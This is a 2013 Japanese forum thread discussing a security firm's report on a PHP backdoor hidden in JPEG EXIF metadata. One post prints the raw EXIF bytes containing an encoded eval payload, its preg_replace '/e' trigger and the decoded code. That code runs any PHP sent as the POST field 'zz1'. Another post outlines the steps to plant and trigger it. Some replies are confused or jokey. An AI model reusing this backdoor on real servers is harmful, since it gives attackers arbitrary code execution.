【注意喚起】 JPEG画像のEXIFヘッダにマルウェアを隠して実行させる新しい手口が登場
1 :
バリニーズ(千葉県):
2 :
バリニーズ(千葉県):2013/07/17(水) 23:30:48.83 ID:J+ZP1lQFP
>>1の続き
続いて、調査チームは「bun.jpg」のEXIFデータ内にバックドアの第2のパーツを見つけました。それがコレ。
yOya^@^PJFIF^@^A^B^@^@d^@d^@^@ya^@!Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@yi^@^QDucky^@^A^@^D^@^@^@<^@^@yi^@^NAdobe^
ファイルというのは通常、同じ種類のものであれば共通のヘッダで始まるもので、1行目の最初の方にある「JFIF」は
このファイルがJPEG画像(JFIF形式のファイル)であることを示しています。
この先を見ていくとEXIF情報が格納されているわけですが、bun.jpgの場合、「Make(メーカー名)」部分には
「"/.*/e".」というワードが含まれていました。このワードは上述の「preg_replace」で、渡されたものをすべて実行するための修飾子として用いられるもの。
さらに見ていくと、「Model(機種名)」部分には「"eval ( base64_decode"」というのが隠れているのが見つかりました。
攻撃者はこの2つの項目と「preg_replace」を利用し、バックドアを作っていたというわけです。
サイト内にあったバックドアの第1のパーツに、コードが実行されることでJPEG画像から
第2のパーツが読み込まれて、最終的に生み出されるのが以下のコード。
preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");
そして、これをデコードした結果がコレ。変数zz1としてPOSTされた内容をいかなるものでも実行するという内容だった、というわけ。
if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..
Sucuri Researchではこれを「電子透かしマルウェア」と呼び、上記のコードで使われていたbun.jpgにしてもその他のイメージにしても、
攻撃サイトとして認定されたサイト上にあるイメージはちゃんと読み込みが可能になっているところが面白いとコメント。
こういったものであっても、自社が提供しているServer Side Scanningであれば検出可能だとアピールしています。
3 :
アフリカゴールデンキャット(千葉県):2013/07/17(水) 23:31:15.67 ID:FLGbBYEs0
マルウェア、コマしたれ
@^A^@
5 :
ウンピョウ(埼玉県):2013/07/17(水) 23:35:49.30 ID:itS6rH1S0
まあにしもよく考えつくな
もうエロサイト見れないな
7 :
しぃ(神奈川県):2013/07/17(水) 23:38:40.96 ID:AM54V2xQ0
角ウェアはないのかね
8 :
ピューマ(群馬県):2013/07/17(水) 23:38:44.41 ID:1ax1cOcH0
これ被害にあうのはサーバーサイドだろ?
P2ユーザーは?
10 :
エジプシャン・マウ(西日本):2013/07/17(水) 23:47:45.24 ID:4py3iuU7O
特定スレが捗るな
11 :
マーゲイ(新疆ウイグル自治区):2013/07/17(水) 23:53:33.12 ID:iZ88CELw0
jpgになんか仕込まれててもいまさら驚きはしない
次から次へといろんな手法よく考えるな
13 :
アメリカンボブテイル(dion軍):2013/07/17(水) 23:57:43.94 ID:xw0dV/EQ0
2chブラウザとかヤバいの?
14 :
マーブルキャット(三重県):2013/07/18(木) 00:00:29.64 ID:R//HJgcR0
exif自体がアメリカが情報収集に使うためじゃねーの?
いらないだろあれ
>>2 @yi^@^QDucky^@^A^@^D^@^@^@<^@^@yi^@^NAdobe^
^A^
^D^
^@^
^@^@yi
何だこいつケンカ売ってんのかこら
「preg_replace」には「/e」という修飾子をつけたとき、
検索・置換の代わりにコンテンツを実行することができるオプションがあります。
なんでこんな糞機能つけたん?
17 :
ヒョウ(新疆ウイグル自治区):2013/07/18(木) 00:02:29.80 ID:zx8aGsWL0
png最強伝説
jpgも危険になる時代がきたか
19 :
ボブキャット(神奈川県):2013/07/18(木) 00:03:48.31 ID:6R9Rrspi0
正規表現には演算機能が無いから足し算引き算などが出来ない。
そういうのを補うためにコードの実行等が出来るようになっている。
20 :
スフィンクス(大阪府):2013/07/18(木) 00:04:50.19 ID:95ZWvyco0
jpgさんが(´;ω;`)
何かを実行させるとか危険なオプション付けるなよ
22 :
猫又(やわらか銀行):2013/07/18(木) 00:05:31.11 ID:9Mmq5/fT0 BE:20408832-PLT(12011)
23 :
ターキッシュバン(家):2013/07/18(木) 00:09:48.94 ID:xh60yygn0
よく分からないんだけど、これに感染したら具体的にどういう被害に遭うの?
24 :
ピクシーボブ(芋):2013/07/18(木) 00:10:30.33 ID:P/dN6ybxP
Macだから問題ない
25 :
クロアシネコ(関東・東海):2013/07/18(木) 00:10:58.91 ID:rrAA7YrPO
jpg恐れるお友達の代わりに、俺ちゃんがリンク踏みまくってやんYO!www
やっぱりガラケー最強やんwwwwww
26 :
ベンガルヤマネコ(三重県):2013/07/18(木) 00:12:26.64 ID:dm3IPzo90
rarにも仕込めるんだよな
たしか
なんかワロタwwwww
セキュリティソフト対策もくぐり抜けるの?
^A^
30 :
アビシニアン(関東・東海):2013/07/18(木) 00:27:37.24 ID:y8JjMdk+O
安全メモ
・画像を開く前に、「バイナリエディタ」で画像のヘッダーを確認しましょう
・Jpegヘッダーを取り除くフリーウェアもあるから、ヘッダーを消しちゃいましょう。
PHP研究所最低だな
注意すべき点何?
これってjpg開いたら掲示板に書き込むとかできるの?
34 :
アフリカゴールデンキャット(東京都):2013/07/18(木) 01:02:14.53 ID:MGeUtbwE0
35 :
ボブキャット(神奈川県):2013/07/18(木) 01:05:43.13 ID:wHuGnweS0
任意のPHPコードを追加出来るってことだからサーバにとっても危険だよなぁ。
第一のパーツは、他の何かで突っ込むのかな
37 :
ぬこ(チベット自治区):2013/07/18(木) 02:29:27.76 ID:PyyUKMza0
こんな詳しく説明したらみんな真似しちゃうだろ!
38 :
ピクシーボブ(関西・北陸):2013/07/18(木) 06:57:32.35 ID:o0dCiAPgP
ガラケー最強伝説
やはりpngが最強だったか
40 :
しぃ(新疆ウイグル自治区):2013/07/18(木) 07:13:25.24 ID:yNGSa7+y0
最近スマホの壁紙がよくわからん画像に置き換わってる事が
あるんだけど気のせいだな
41 :
アメリカンカール(愛知県):2013/07/18(木) 07:40:30.34 ID:a+4OQ4we0
最近PCが重い!
│
├ 1.PCを掃除する
│
│ [まちがい]
│ 確実な方法ではありますが、手間がかかるのが難点です。
│ それよりも別の手段を探してみませんか?
│ ちょっとしたフリーウェアでなんとかなるかも?
│ ↑
│ ココがポイント!
│
└ 2.RegSeekerを使う
[せいかい]
42 :
アムールヤマネコ(東日本):2013/07/18(木) 08:12:11.86 ID:5mZ99IS30
で、ポストする先は?ローカルを如何こうするワケじゃなく、外部へ何をポストする?
43 :
アメリカンショートヘア(千葉県):2013/07/18(木) 08:21:53.84 ID:LqJpV3UI0
^O^A^
44 :
ピクシーボブ(愛知県):2013/07/18(木) 11:39:17.29 ID:+3mHymSkP
よく分からんな。
任意のPHPコードが実行されるって被害を受けるのはサーバさろ。
バックドアである第1のパーツを仕込んでる時点でそのサーバは操作されてる訳で
こんな面倒なことする必要がないと思うが。
アクセス者からしてみれば信用してないサイトにXSSの問題が有るだけだろ。
信頼されてないサイトにXSSの問題が有ろうがどうでもいいことだ。
45 :
キジ白(関西・東海):2013/07/18(木) 11:41:38.57 ID:3mgYkVwG0
ふはは!我がP901iSは永久に不滅じゃ!
ゆうちゃんのアレみたいに、こんなフリーソフト作ったよ使ってみて
みたいな感じで個人のPCで実行されたら
知らない内に変なプログラム実行されてあんな事やこんな事されちゃうの?><
新しい画像ビューワ作ったから使ってみて意見下さい、とか
画像処理を高速化するために実行するコードを許可して下さいみたいな前置きしてさ
割と最近imgur荒しが湧いてたじゃん
あそこら辺で、画像にも仕込むことが出来るらしいっていう理解は進んだけど
怖いわあ
48 :
ベンガルヤマネコ(三重県):2013/07/18(木) 17:49:07.43 ID:dm3IPzo90
>>47 何それ?
imgurってexif消すから起きないと思うんだけど違うの?
49 :
アムールヤマネコ(家):2013/07/18(木) 21:45:03.27 ID:DzmIb7/Z0
50 :
アメリカンワイヤーヘア(dion軍):2013/07/18(木) 23:37:29.00 ID:7aq2MXQb0
実例はないの
51 :
マンクス(静岡県):2013/07/18(木) 23:40:44.42 ID:OTM3KeVR0
ん?
52 :
カラカル(関東・甲信越):2013/07/18(木) 23:41:59.11 ID:i1KrKjPrO
で、俺は何から質問したらいいんだ?
53 :
スナネコ(大阪府):2013/07/18(木) 23:44:38.32 ID:KKWJEps80
ブラウザで読み込んだ瞬間死亡なの?
54 :
リビアヤマネコ(東京都):2013/07/18(木) 23:48:09.95 ID:kjJqy1O60
俺、古い画像処理ソフト持ってるからDLしたらそれで開いて再保存すれば
EXIFヘッダースルーで読み込んで保存時に消えるから、回避出来そう
56 :
アムールヤマネコ(三重県):2013/07/19(金) 00:18:00.37 ID:vAC/fCe40
フォトショやGIMPで開いても死亡なん?
>>56 phpっていうサーバサイドの機能で実行するから
フォトショやGIMPには実行する方法がないから無害
>>55 分かっているとは思うけど、死亡するのはサーバ側だよ。
preg_replaceのeオプションで実行されるのはサーバ側。
実行結果を送信してクライアントが受け取ったとしても、
JPEG表示は散々ここら辺の穴をやられまくってきたので対策が進んでいて、
普通に画像を表示するか、エラー表示をするかのどちらかで済むと思っていい。
59 :
トンキニーズ(滋賀県):2013/07/19(金) 00:40:57.36 ID:oFke9Te80
麻呂が死んじゃう!
(1)どこかのPHPスクリプト内に第1のパーツを仕込む
(2)同じサーバー上に第2のパーツを仕込む
(3)第1のパーツを仕込んだPHPスクリプトをこっそり実行する(その時に任意のコードをPOSTする)
第1のパーツを仕込んだスクリプトは、普段は実行しても無害なんだけど、
zz1という変数名で値をPOSTした時だけはバックドアとして機能すると
こういう方法もあるんだね・・
画像は仕込めてもPHPスクリプトはどうやって相手のサーバーに
仕込むの?
それが出来てたらもう既にいろんなことできてないの?
62 :
ベンガル(岡山県):2013/07/19(金) 08:32:23.95 ID:8hILK3Ql0
中国の画像とか危なそう
63 :
ギコ(東日本):2013/07/19(金) 09:01:44.89 ID:vR8F58OP0
なんか必死に騒ぎを大きくしたい、ローカルに話を持って行きたい奴らが居るのね?w。
64 :
サーバル(兵庫県):2013/07/19(金) 11:24:16.86 ID:0+6OyN5/0
デジタルカメラやスマートフォン、携帯電話で写真を撮ると、撮影日時や撮影時のカメラの設定などの情報が写真に記録されます。
これがEXIF情報(EXIFデータ)と呼ばれるもので、
素でこれいらないのに何で記録されんの?
.jpg
.jpe
.jpeg
統一しろよ
昔は一部だけ開けないソフトもあった